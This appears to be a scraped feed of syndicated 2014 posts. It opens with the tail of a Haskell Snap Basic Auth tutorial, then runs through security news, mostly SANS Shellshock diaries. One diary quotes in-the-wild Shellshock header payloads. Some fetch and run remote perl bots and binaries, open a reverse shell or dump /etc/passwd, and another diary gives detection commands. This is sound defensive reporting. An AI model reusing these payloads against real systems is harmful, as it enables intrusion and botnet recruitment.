myAuthAPIGetUser aa@(MyAuthAPI _ _) hdr =
    handle handler $ do
        resp <- myAuthAPIReqJSON aa hdr
        determineUserFromResponse resp
  where
    handler :: SomeException -> IO (Maybe a)
    handler x = do
        Prelude.putStrLn $ show x
        return Nothing
myAuthAPIGetUser _ _ = error "Not a valid auth type"

This consists of two stages:

  1. Querying the API and attempting to get a JSON response
  2. Checking to see if the JSON response translates to a valid user

Along the way, it tries to catch any Exceptions that get thrown, and returns a Nothing to indicate that we couldn’t get any users from the API.

Querying the API and attempting to get a JSON response

For this part, we’re using the wreq package, which is a tiny little HTTP client designed for user friendliness and brevity. There are many other HTTP clients available in Haskell; this is but one of them.

myAuthAPIReqJSON :: BasicAuthDataSource -> AuthHeader -> IO (Response ByteString)
myAuthAPIReqJSON (MyAuthAPI url method) hdr =
    case method of
        "get" -> getWith opts url
        "post" -> postWith opts url (pack "")
        _ -> error "Not a valid request verb"
  where
    opts = defaults
        & header "Authorization" .~ [pack $ rqAuthHeader hdr]
        & header "Accept" .~ [pack "application/json"]
    rqAuthHeader (BasicAuth x) = "Basic " ++ (unpack x)
myAuthAPIReqJSON _ _ = error "Not a valid auth type"

As you can see, we’re allowing both HTTP GET and POST methods for querying our endpoint, and we’re passing the Basic Authorization header that we got as part of our request straight on to the API we’re querying, without decoding it. Pretty nifty, eh? However, if you do need to use decodeAuthHeader to split your AuthHeader up into a username & password, now is the time to do it.
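If you do take the decoding route, wreq can also rebuild the header for you from the split credentials. A hypothetical variant of the opts above, using wreq’s auth lens and basicAuth helper together with ?~ from the lens package, might look like this:

-- Hypothetical alternative: decode the header ourselves and let wreq
-- reconstruct the Basic credentials via its auth option.
optsFor :: AuthHeader -> Options
optsFor hdr =
    case decodeAuthHeader hdr of
        Just (u, p) -> defaults & auth ?~ basicAuth u p
                                & header "Accept" .~ [pack "application/json"]
        Nothing     -> defaults & header "Accept" .~ [pack "application/json"]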

We’re also making sure to set our Accept header, so we can get a JSON response (if the server is obeying us). Either way, regardless of what happens, we get a Response ByteString back from the API, and we’re ready to determine if we can extract a user from it.

Checking to see if the JSON response translates to a valid user

Let’s extract a user from this API response.

For the sake of argument, let’s say that the API returns a user in the following form:

{
    "_id": "12345",
    "_url": "https://api.example.com/user/12345",
    "identity": "alexandra.mack@example.com",
    "roles": ["SystemAdministrator"]
}

We can define a temporary data type for this JSON structure that we can later translate to an AuthUser. We’ll also define an instance of the FromJSON class, as defined by the aeson package.

data MyAuthAPIUser = MyAuthAPIUser {
    apiUserID :: String,
    apiUserURL :: String,
    apiUserIdentity :: String,
    apiUserRoles :: [String]
}

instance FromJSON MyAuthAPIUser where
    parseJSON (Object v) = MyAuthAPIUser <$>
        v .: "_id" <*>
        v .: "_url" <*>
        v .: "identity" <*>
        v .: "roles"
    parseJSON _ = error "Unexpected JSON input"

Now that we have this temporary structure, let’s implement determineUserFromResponse.

determineUserFromResponse :: Response ByteString -> IO (Maybe AuthUser)
determineUserFromResponse r = do
    case decode (r ^. responseBody) :: Maybe MyAuthAPIUser of
        Nothing -> return Nothing
        Just u -> return $ Just $ AuthUser (pack $ apiUserIdentity u) (udList u)
  where
    udList u = fromList $ map (\(a, b) -> (pack a, pack b)) [
        ("internalID", apiUserID u),
        ("roles", intercalate "," $ apiUserRoles u),
        ("url", apiUserURL u)]

We’re attempting to extract the Response‘s body and decode it to a MyAuthAPIUser in one swoop here. If we successfully decode it, we can generate an AuthUser from the contents of the MyAuthAPI user. If we fail to decode it, we can assume that the response didn’t contain a valid user at all.

And that’s it – we have everything we need to get a user from the API!

Conclusion

We’ve taken the long way around, but I hope this has been useful, at least as far as explaining how you can perform common tasks in Snap and use application state to keep track of configuration. In a future post, I might be able to elaborate on how to turn this simple example of state within Snap into a complete Snaplet.

In future months, you’ll probably start to see more web technology coming out of Anchor that is based on Haskell, and we’re looking forward to building more and more stuff based on it. Hopefully I’ll be able to explain some of it to you, and if there’s anything we can give back to the wider community, we’ll see what we can do.


Thanks to Andrew Cowie, Tran Ma, Sharif Olorin and Thomas Sutton for their proofreading and suggestions.

The post HTTP Basic Authentication in Snap Framework appeared first on Anchor Managed Hosting.

SANS Internet Storm Center, InfoCON: yellow: Apple Released Update to Fix Shellshock Vulnerability http://support.apple.com/kb/DL1769, (Mon, Sep 29th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Krebs on Security: We Take Your Privacy and Security. Seriously.

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

“Please note that [COMPANY NAME] takes the security of your personal data very seriously.” If you’ve been on the Internet for any length of time, chances are very good that you’ve received at least one breach notification email or letter that includes some version of this obligatory line. But as far as lines go, this one is about as convincing as the classic break-up line, “It’s not you, it’s me.”


I was reminded of the sheer emptiness of this corporate breach-speak approximately two weeks ago, after receiving a snail mail letter from my Internet service provider — Cox Communications. In its letter, the company explained:

“On or about Aug. 13, 2014, we learned that one of our customer service representatives had her account credentials compromised by an unknown individual. This incident allowed the unauthorized person to view personal information associated with a small number of Cox accounts. The information which could have been viewed included your name, address, email address, your Secret Question/Answer, PIN and in some cases, the last four digits only of your Social Security number or drivers’ license number.”

The letter ended with the textbook offer of free credit monitoring services (through Experian, no less), and the obligatory “Please note that Cox takes the security of your personal data very seriously.” But I wondered how seriously they really take it. So, I called the number on the back of the letter, and was directed to Stephen Boggs, director of public affairs at Cox.

Boggs said that the trouble started after a female customer account representative was “socially engineered” or tricked into giving away her account credentials to a caller posing as a Cox tech support staffer. Boggs informed me that I was one of just 52 customers whose information the attacker(s) looked up after hijacking the customer service rep’s account.

The nature of the attack described by Boggs suggested two things: 1) That the login page that Cox employees use to access customer information is available on the larger Internet (i.e., it is not an internal-only application); and that 2) the customer support representative was able to access that public portal with nothing more than a username and a password.

Boggs either did not want to answer or did not know the answer to my main question: Were Cox customer support employees required to use multi-factor or two-factor authentication to access their accounts? Boggs promised to call back with a definitive response. To Cox’s credit, he did call back a few hours later, and confirmed my suspicions.

“We do use multifactor authentication in various cases,” Boggs said. “However, in this situation there was not two-factor authentication. We are taking steps based on our investigation to close this gap, as well as to conduct re-training of our customer service representatives to close that loop as well.”

This sad state of affairs is likely the same across multiple companies that claim to be protecting your personal and financial data. In my opinion, any company — particularly one in the ISP business — that isn’t using more than a username and a password to protect their customers’ personal information should be publicly shamed.

Unfortunately, most companies will not proactively take steps to safeguard this information until they are forced to do so — usually in response to a data breach.  Barring any pressure from Congress to find proactive ways to avoid breaches like this one, companies will continue to guarantee the security and privacy of their customers’ records, one breach at a time.

SANS Internet Storm Center, InfoCON: yellow: Shellshock: Updated Webcast (Now 6 bash related CVEs!), (Mon, Sep 29th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow

I just published an updated YouTube presentation (about 15 min in length) with some of the Shellshock-related news from the last couple of days:

YouTube: https://www.youtube.com/watch?v=b2HKgkH4LrQ
PDF: https://isc.sans.edu/presentations/ShellShockV2.pdf
PPT: https://isc.sans.edu/presentations/ShellShockV2.pptx


As always, the material is published “Creative Commons / share alike”, so feel free to use the slides.

 


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

LWN.net: Security advisories for Monday

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

Debian has updated chromium-browser (multiple vulnerabilities).

Fedora has updated libvncserver (F20: multiple vulnerabilities), nodejs (F20; F19: denial of service), perl-Data-Dumper (F20: denial of service), and v8 (F20; F19: multiple vulnerabilities).

Mageia has updated bash (code injection, command execution) and kernel (MG3: denial of service).

Mandriva has updated perl-XML-DT (file overwrites).

openSUSE has updated bash (13.1, 12.3; 12.3; 13.1; 11.4; 13.2: multiple vulnerabilities), dbus-1 (13.1; 12.3: multiple vulnerabilities), kernel (11.4: multiple vulnerabilities), geary (13.1: TLS certificate issues), bash (11.4: command execution), mozilla-nss (13.1, 12.3: signature forgery), NSS (11.4: signature forgery), php5 (11.4: multiple vulnerabilities), php5 (11.4: multiple vulnerabilities), srtp (13.1: denial of service), and wireshark (13.1, 12.3: multiple vulnerabilities).

Slackware has updated firefox (multiple vulnerabilities), thunderbird (multiple vulnerabilities), and seamonkey (multiple vulnerabilities).

SUSE has updated bash (SLE11, SLE10: multiple vulnerabilities) and mozilla-nss (SLES11 SP2: signature forgery).

Darknet - The Darkside: masscan – The Fastest TCP Port Scanner

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

masscan is the fastest TCP port scanner. It can scan the entire Internet in under 6 minutes, transmitting 10 million packets per second. It produces results similar to nmap, the most famous port scanner. Internally, it operates more like scanrand, unicornscan, and ZMap, using asynchronous transmission. The major difference is that it’s…

Read the full post at darknet.org.uk

TorrentFreak: Photographer Sues Imgur For Failing to Remove Copyrighted Photos

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

When it comes to online piracy, most attention usually goes to music, TV-shows and movies. However, photos are arguably the most-infringed works online.

Virtually every person on the Internet has shared a photo without obtaining permission from its maker, whether through social networks, blogs or other services.

While this is usually not a problem with a picture of the average Internet meme, when it comes to professional photography there can be serious consequences.

Earlier this year the Seattle-based artist Christopher Boffoli discovered that dozens of photos from his well-known “miniatures of food” series were being shared on Imgur. The photos were uploaded by a user named kdcoco who published them without permission.

This type of infringement is fairly common and usually easy to stop through a DMCA notice. In this case, however, that didn’t produce any results, so the photographer saw no other option than to take Imgur to court.

In a complaint (pdf) filed at a federal court in Seattle, Boffoli explains that he sent Imgur a DMCA takedown request on February 21. This seemed to work, as the image sharing site was quick to respond.

“The images have been marked for removal and will be deleted from all of our servers within 24 hours,” Imgur quickly replied.

One of Boffoli’s photos

But following this initial reply nothing happened. According to the complaint all of the images remained online for several months.

“As late as September 2014 — more than 200 days after receiving Boffoli’s notice — Imgur had not removed or disabled access to the Infringing Content. To date, the Infringing Content is still accessible on Imgur’s servers,” the photographer’s lawyers write.

Aside from the infringing behavior of the Imgur user, Boffoli holds the image sharing service responsible for continued copyright infringement.

“Imgur had actual knowledge of the Infringing Content. Boffoli provided notice to Imgur in compliance with the DMCA, and Imgur failed to expeditiously disable access to or remove the Infringing Website,”

The photographer is asking the court to order an injunction preventing Imgur from making his work available. In addition, the complaint asks for actual and statutory damages for willful copyright infringement.

With at least 73 photos in the lawsuit, Imgur theoretically faces more than $10 million in damages. Thus far Imgur hasn’t responded to the complaint but at the time of writing the infringing photos are no longer available online.

It’s not the first time Boffoli has sued an online service for failing to remove his photos. He also filed lawsuits against Twitter, Google and others. These cases were settled out of court under undisclosed terms.

Time will tell whether Imgur will go for the same option, or if it will defend itself in court.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: yellow: Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow

Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it. Here is a quick review of exploits that our honeypots and live servers have seen so far:

1 – Simple “vulnerability checks” that used custom User-Agents:

() { 0v3r1d3;};echo x22Content-type: text/plainx22; echo; uname -a;
() { :;}; echo ‘Shellshock: Vulnerable’
() { :;};echo content-type:text/plain;echo;echo [random string];echo;exit
() { :;}; /bin/bash -c “echo testing[number]“; /bin/uname -ax0ax0a
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 x22() { test;};echo x5Cx22Co
ntent-type: text/plainx5Cx22; echo; echo; /bin/cat /etc/passwdx22 http://[IP address]/cgi-bin/test.cgi

This one is a bit different. It includes the tested URL as user agent. But of course, it doesn’t escape special characters correctly, so this exploit would fail in this case. The page at 89.248.172.139 appears to only return an “empty page” message.

) { :;}; /bin/bash -c x22wget -U BashNslash.http://isc.sans.edu/diary/Update+on+CVE-2014-6271:+Vulnerability+in+bash+(shellshock)/18707 89.248.172.139×22

 

2 – Bots using the shellshock vulnerability:

This one installs a simple perl bot. It connects to irc.hacker-newbie.org on port 6667, channel #bug.

() { :; }; x22exec(‘/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b
0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0
b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http
://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt’)x22;” “() { :; }; x22exec(‘/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/sh
ock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.
com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http:
//xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt’)x22;

3 – Vulnerability checks using multiple headers:

GET / HTTP/1.0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
Accept: */*
Cookie: () { :; }; ping -c 3 [ipaddress]
Host: () { :; }; ping -c 3 [ipaddress]
Referer: () { :; }; ping -c 3 [ipaddress]

4 – Using Multiple headers to install perl reverse shell (shell connects to 46.246.34.82 port 1992 in this case)

GET / HTTP/1.1
Host: [ip address]
Cookie:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl
Referer:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl

5 – Using User-Agent to report system parameters back (the IP address is currently not responding)

GET / HTTP/1.0
Accept: */*
aUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3
Host: () { :; }; wget -qO- 82.221.99.235 -U=”$(uname -a)”
Cookie: () { :; }; wget -qO- 82.221.99.235 -U=”$(uname -a)” 

6 – User-Agent used to install perl box

GET / HTTP/1.0
Host: [ip address]
User-Agent: () { :;}; /bin/bash -c “wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*

 

 


Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

LWN.net: LibreSSL: More Than 30 Days Later

This post was syndicated from: LWN.net and was written by: corbet. Original post: at LWN.net

Ted Unangst has posted an update on LibreSSL development. “Joel and I have been working on a replacement API for OpenSSL, appropriately entitled ressl. Reimagined SSL is how I think of it. Our goals are consistency and simplicity. In particular, we answer the question ‘What would the user like to do?’ and not ‘What does the TLS protocol allow the user to do?’. You can make a secure connection to a server. You can host a secure server. You can read and write some data over that connection.”

Raspberry Pi: CNBC visit Pi Towers

This post was syndicated from: Raspberry Pi and was written by: Liz Upton. Original post: at Raspberry Pi

At the start of September, a film crew from CNBC came to visit Cambridge. They spent some time with us at Pi Towers, and came to the Cambridge Jam the next day to talk to some of the kids there who use the Raspberry Pi. They produced two short videos, both full of footage from the Jam and our office – see how many familiar faces you can spot!

SANS Internet Storm Center, InfoCON: yellow: Shellshock: We are not done yet CVE-2014-6277, CVE-2014-6278, (Mon, Sep 29th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow

With everybody’s eyes on bash vulnerabilities, two new problems have been found [1]. These problems have been assigned CVE-2014-6277 and CVE-2014-6278. These issues are unrelated to the environment variable code injection of shellshock, but could also lead to code execution.

I hope you are keeping good notes, as you patch, about which systems use bash and how. It looks like bash will keep us busy for a bit.

[1] http://www.openwall.com/lists/oss-security/2014/09/25/32


Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

SANS Internet Storm Center, InfoCON: yellow: Shellshock: Vulnerable Systems you may have missed and how to move forward, (Mon, Sep 29th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow

By now, I hope you are well on your way to patching your Linux systems for the bash code injection vulnerabilities. At this point, you should probably dig a bit deeper and try to find more “hidden” places that may be vulnerable. First of all, a quick list of things that are not vulnerable, or at least not exposed by default:

  • iOS, Android and many similar systems that use ash instead of bash.
  • Many systems are vulnerable, but the vulnerability is not exposed by default. In this case, patching is less urgent but should still be done as soon as patches are available. For example, in OS X there is no web server installed by default, and the DHCP client does not call shell scripts the way Linux does. Solaris uses ksh by default.
  • Many small embedded systems use busybox, not bash, and are not vulnerable.

Now, which systems may you have missed in your first quick survey? First of all, vulnerability scanners will only find the low-hanging fruit for this one, particularly early on. There are many larger web applications with a couple of small cgi-bin scripts that are easily missed.

  • In Apache, look for ExecCGI anywhere in your Apache configuration (not just httpd.conf; also check files included by httpd.conf, such as virtual host configurations). If possible, remove ExecCGI if it was just set up by a default install. A rough sketch of this and the next check follows this list.
  • Check if /bin/sh is a symlink to /bin/bash or, worse, a copy of /bin/bash. Just to make sure, try the exploit against the other shells on the system (I have seen admins rename bash for convenience…).
  • While Android is not vulnerable by default, it is possible to install bash on Android.
  • Even Windows can be made vulnerable if you install tools like Cygwin and expose them via a web server.
  • “Larger” embedded devices, unlike the small devices based on busybox, do sometimes include bash. Depending on how much access you have to the device, this can be hard to figure out.
  • CGI web applications that are written in languages other than bash but call bash (e.g., via exec(), popen(), or similar functions).
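
The Apache and /bin/sh checks above can be scripted in a couple of lines. A rough sketch, assuming a typical Linux layout (adjust the paths for your distribution):

# Find CGI handling anywhere in the Apache configuration, including included files.
grep -RiE 'ExecCGI|AddHandler.*cgi' /etc/httpd /etc/apache2 2>/dev/null

# Is /bin/sh really bash in disguise?
ls -l /bin/sh
readlink -f /bin/sh

# Try the function import against every shell you find, not just /bin/bash.
for sh in /bin/bash /bin/sh /bin/ksh /bin/zsh; do
    [ -x "$sh" ] && echo "== $sh" && env x='() { :;}; echo vulnerable' "$sh" -c "echo test"
done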

And some good news: the signature “() {” for the exploit is actually better than I thought originally. It turns out that added spaces or other modifications to this string will break the exploit.
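
One cheap way to use that signature is to grep your web server logs for it; with the common “combined” log format, the User-Agent and Referer headers are recorded, so many of the probes shown above leave a visible trail. A quick sketch (log paths are typical defaults and will differ between distributions):

# Look for shellshock probes that made it into access logs.
grep -H '() {' /var/log/apache2/access*.log /var/log/httpd/access_log* /var/log/nginx/access*.log 2>/dev/null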

So in short, your priority list should look like:

  • If you find exposed bash scripts in cgi-bin on a publicly reachable server today: assume the server is compromised.
  • Focus on web servers. Patch all web servers as soon as possible, even if you currently don’t use cgi-bin. It is too easy to miss a script.
  • Any vulnerable system that uses restricted ssh shells.
  • Any vulnerable system that is used outside your perimeter (to avoid DHCP attacks).

Moving forward: The idea of writing web applications in bash (or other shell scripting languages) is pretty dangerous in the first place. It should be done with care, and if possible, use a different language (perl, php, python), as they provide better input validation libraries. SELinux was mentioned as a countermeasure, but in this case it may not work quite as well as hoped. Regardless, learn how to use it and don’t just turn it off the first time it gets in the way. Systems like web application firewalls and IPSs are very useful in a case like this for virtual patching. Make sure you have these systems in place, even if, for the most part, you use them just to alert and log rather than block.

Fellow handler Rob put together this list of “likely to be missed” machines:

  • web content control servers
  • e-mail gateways
  • proxy servers
  • web application firewalls (WAFs)
  • IPS sensors and servers
  • wireless controllers
  • VoIP servers
  • firewalls
  • enterprise-class routers or switches (yes, really)
  • any virtual machine that you got as an OVA or OVF from a vendor


Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Schneier on Security: NSA Patents Available for License

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

There’s a new article on NSA’s Technology Transfer Program, a 1990s-era program to license NSA patents to private industry. I was pretty dismissive about the offerings in the article, and I didn’t find anything interesting in the catalog. Does anyone see something I missed?

My guess is that the good stuff remains classified, and isn’t “transferred” to anyone.

Slashdot thread.